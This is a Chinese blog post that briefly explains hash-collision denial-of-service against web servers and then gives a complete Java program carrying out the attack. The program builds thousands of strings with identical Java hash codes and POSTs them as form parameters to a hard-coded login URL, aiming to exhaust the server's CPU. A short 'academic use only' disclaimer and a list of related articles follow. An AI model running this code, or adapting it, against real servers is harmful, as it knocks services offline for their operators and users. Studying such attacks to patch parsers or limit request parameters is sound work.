Hash Collision DoS代码

最新推荐文章于 2018-06-21 23:51:38 发布
最新推荐文章于 2018-06-21 23:51:38 发布
阅读量117 收藏 1
点赞数 1
分类专栏: Web安全 文章标签: hash colllision dos web security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_6700/article/details/82280505
版权

最近看Web安全,看到最近这篇文章:Hash Collision DoS 问题

原理很简单,利用现有语言服务器的hash code实现缺陷,构造大量hash code相等的字符串,做成post的参数,让服务器忙于创建和查询hash map,从而是服务器拒绝服务。详细描述可以看上面那篇文章。

我试着写了个攻击的例子代码:

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;

public class HashCollisionDosAttack {
	private final String[] srcs= {"Aa", "BB"};

	private List<String> getStrings(int n) {
		List<String> strlist = new ArrayList<String>();

		int round = (int) Math.pow(2, n);
		for (int i = 0; i < round; ++i) {
			strlist.add(getString(i, n));
		}
		return strlist;
	}

	private String getString(int index, int n) {
		String str = "";
		int[] bytes = getBytesOf(index, n);
		for (int i = 0; i < bytes.length; ++i) {
			str += srcs[bytes[i]];
		}
		return str;
	}

	private int[] getBytesOf(int index, int n) {
		int[] bytes = new int[n];
		for (int i = 0; i < n; ++i) {
			bytes[n - i - 1] = 1 & (index >> i);
		}
		return bytes;
	}

	private void post(URL url, String params) {
		Socket socket = null;
		BufferedWriter bw = null;
		BufferedReader br= null;
		try {
			socket = new Socket(url.getHost(), url.getPort());
			bw = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
			bw.write("POST " + url.getPath() + " HTTP/1.1\r\n");
			bw.write("Host: " + url.getHost() + "\r\n");
			bw.write("Content-Type: application/x-www-form-urlencoded\r\n");
			bw.write("Content-Length: " + params.length() + "\r\n");
			bw.write("Connection: Keep-Alive\r\n");
			bw.write("\r\n");
			bw.write(params);
			bw.flush();

//	      br = new BufferedReader(new InputStreamReader(socket.getInputStream(),"UTF-8"));
//	      String line;
//          while ((line = br.readLine()) != null) {
//            System.out.println(line);
//          }

//          System.out.println(params);
		} catch (Exception e) {
			e.printStackTrace();
		} finally {
			if (null != socket) {
				try {
					socket.close();
				} catch (IOException e) {
					e.printStackTrace();
				}
			}

			if (null != bw) {
				try {
					bw.close();
				} catch (IOException e) {
					e.printStackTrace();
				}
			}
			if (null != br) {
				try {
					br.close();
				} catch (IOException e) {
					e.printStackTrace();
				}
			}
		}
	}

	public void attack(String urlStr, int n) throws MalformedURLException {
		String params = "";
		for (int i = 1; i <= n; ++i) {
			params += buildParams(getStrings(i));
		}

		URL url = new URL(urlStr);
		post(url, params);
	}

	private String buildParams(List<String> strings) {
		String params = "";
		for (String str : strings) {
			params += str + "=x&";
			params.hashCode();
		}
		return params;
	}

	public static void main(String[] args) throws MalformedURLException {
		HashCollisionDosAttack attack = new HashCollisionDosAttack();
		attack.attack("http://frigile.com/login/login.htm", 15);
	}
}

 仅作学术交流,请勿用于非法目的。

iteye_6700
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Hash碰撞进行DoS攻击
zhaohong_bo的专栏
05-22 1860
一、哈希表碰撞攻击的基本原理 哈希表是一种查找效率极高的数据结构,很多语言都在内部实现了哈希表。PHP中的哈希表是一种极为重要的数据结构,不但用于表示Array数据类型,还在Zend虚拟机内部用于存储上下文环境信息(执行上下文的变量及函数均使用哈希表结构存储)。 理想情况下哈希表插入和查找操作的时间复杂度均为O(1),任何一个数据项可以在一个与哈希表长度无关的时间内计算出一个哈希值(key),然后...
Hash Collision DoS
nicelemon的专栏
08-12 139
  Hash Collision DoS:由于java中的hash算法是非随机性的,会存在hash碰撞的问题。这样就可以利用这一弱点,来构造若干个value相同,但是key不相同的数据,这个时候hashMap就会退化为一个单向链表,使得在查询时计算复杂度由O(n)变为O(n*n),CPU负担加重,性能以指数级急剧下降。 影响: 一些应用服务器,比如tomcat在接收请求参数param...
关于Hash Collision DoS漏洞:web实例
03-31
NULL 博文链接:https://goodscript.iteye.com/blog/1338973
Resin上的Hash Collision DoS
New World
03-19 1465
Hash Collision DoS 1、描述 Hash Collision Dos攻击的原理很简单, 目前很多语言, 使用hash来存储k-v数据, 包括常用的来自用户的POST数据, 攻击者可以通过构造请求参数, POST大量的特殊的”k”值(根据每个语言的Hash算法不同而定制), 使得语言底层保存POST数据的Hash表因为”冲突”(碰撞)而退化成链表,使每次读取、插入操作都需要遍历链
HASH碰撞
热门推荐
kjfcpua的专栏
03-13 2万+
如果两个输入串的hash函数的值一样,则称这两个串是一个碰撞(Collision)。既然是把任意长度的字符串变成固定长度的字符串,所以必有一个输出串对应无穷多个输入串,碰撞是必然存在的。 一个优良的hash函数 f 应当满足以下三个条件: (1)对于任意y,寻找x,使得f(x)=y,在计算上是不可行的。 (2)给定x1∈A,找x2∈B,,使得f(x1)=f(x2),在计算上是不可
Java Hash Collision DoS Attack
03-19
Java实现的Hash Collision DoS Attack
警惕Hash Collision Dos.pdf
01-06
警惕Hash Collision Dos.pdf
hashcollision
07-07
莫尔斯电码哈希碰撞检测器这是什么? 这个小工具将相当于字母表中每个字母的二进制莫尔斯电码转换为一个数字。 这个数字可以用作表的索引。你为什么需要这个? 如果您正在尝试莫尔斯电码挑战,此工具会计算将二进制...
geohash算法实现Java代码
02-06
Java代码实现GeoHash时,可以创建一个GeoHash类,包含 encode 和 decode 方法。encode方法用于生成GeoHash字符串,decode方法则用于还原经纬度坐标。此外,还可以扩展类来支持范围查询,例如计算两个GeoHash之间的...
有关 Hash Collision DoS 的一些问题
u011045817的专栏
03-19 473
前段时间,除了大陆明文暗码的安全事情,另有一个事是比较大的,那便是 Hash Collision DoS (Hash碰撞的回绝式效劳打击),有歹意的人会经过这个安全缺点会让你的服务器运转非常的慢。这个安全弱点应用了各言语的Hash算法的“非随机性”能够制造出N多的value不同,然则key一样数据,然后让你的Hash表成为一张单向链表,而招致你的整个网站或是步伐的运行性能以级数降落(能够很轻松的让
Hash Collision DoS 问题
likika2012的专栏
12-31 836
最近,除了国内明文密码的安全事件,还有一个事是比较大的,那就是 Hash Collision DoSHash碰撞的拒绝式服务攻击),有恶意的人会通过这个安全弱点会让你的服务器运行巨慢无比。这个安全弱点利用了各语言的Hash算法的“非随机性”可以制造出N多的value不一样,但是key一样数据,然后让你的Hash表成为一张单向链表,而导致你的整个网站或是程序的运行性能以级数下降(可以很轻松的让你
HASH COLLISION DOS 问题
起风了
06-21 315
原文: https://www.cnblogs.com/stevenczp/p/7028071.html 最近,除了国内明文密码的安全事件,还有一个事是比较大的,那就是 Hash Collision DoSHash碰撞的拒绝式服务攻击),有恶意的人会通过这个安全弱点会让你的服务器运行巨慢无比。这个安全弱点利用了各语言的Hash算法的“非随机性”可以制造出N多的value不一样,但是key一样...
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
07-08
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
2003-2023年飞机航线信息数据.xlsx
07-08
2003-2023年飞机航线信息数据 1、时间:2003-2023年 2、来源:高铁航线数据库(Chinese High-speed Rail and Airline Database,CRAD) 3、指标:起点城市、起点城市所属地级市、起点城市所属省份、起点机场、终点城市、终点城市所属地级市、终点城市所属省份、终点机场、航空公司、更新日期、航班、出发时间、到达时间、准点率、班次_周一、班次_周二、班次_周三、班次_周四、班次_周五、班次_周六、班次_周日
Xilinx Vitis 2020工程源目录修改
07-08
Xilinx Vitis可以做standalone程序开发,不过其工程中使用的路径为绝对路径。工程更换位置后编译将会显示错误。例如:源目录为D:/work,复制到同事电脑上放到C:/work(同事电脑只有一个C盘)。利用Vitis打开工程编译会有一堆错误,提示文件找不到。本脚本用来解决该问题。
1000__gpt_4_prompts.md
07-08
1000__gpt_4_prompts
电子行业点评:算力需求持续提升,景嘉微强势入局.pdf
最新发布
07-08
电子元件 电子行业 行业分析 数据分析 数据报告 行业报告
hudi hash collision on user-specified id
12-05
Hudi是一种数据湖技术,可以实现增量数据的写入和更新。在进行数据写入或更新操作时,Hudi会使用用户指定的ID字段进行数据分区和唯一性校验。然而,由于数据量大或者ID字段设计不合理等原因,可能会出现hash collision的情况,即不同的数据被映射到了相同的hash分区位置,导致数据覆盖或错误。 当出现hudi hash collision on user-specified id时,需要进行以下处理:首先,要检查ID字段的设计是否合理,确保ID字段能够唯一标识数据记录,避免冲突发生。其次,可以考虑使用更长的hash分区键来减小碰撞的概率,或者对hash函数进行调优。此外,也可以考虑使用其他字段作为辅助分区键,来帮助数据更好地分布。最后,需要对碰撞发生的数据进行修复和清理,恢复数据的正确性和完整性。 在实际应用中,为了减少hudi hash collision on user-specified id的发生,需要充分考虑数据的特点和业务需求,合理设计ID字段和分区键,避免数据分布不均匀,提高数据写入和查询的效率。同时,也需要对Hudi的配置参数和hash函数进行优化,以保证系统的稳定性和性能。与此同时,定期监控和维护系统,及时发现和处理hash collision的问题,保障数据的准确性和一致性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值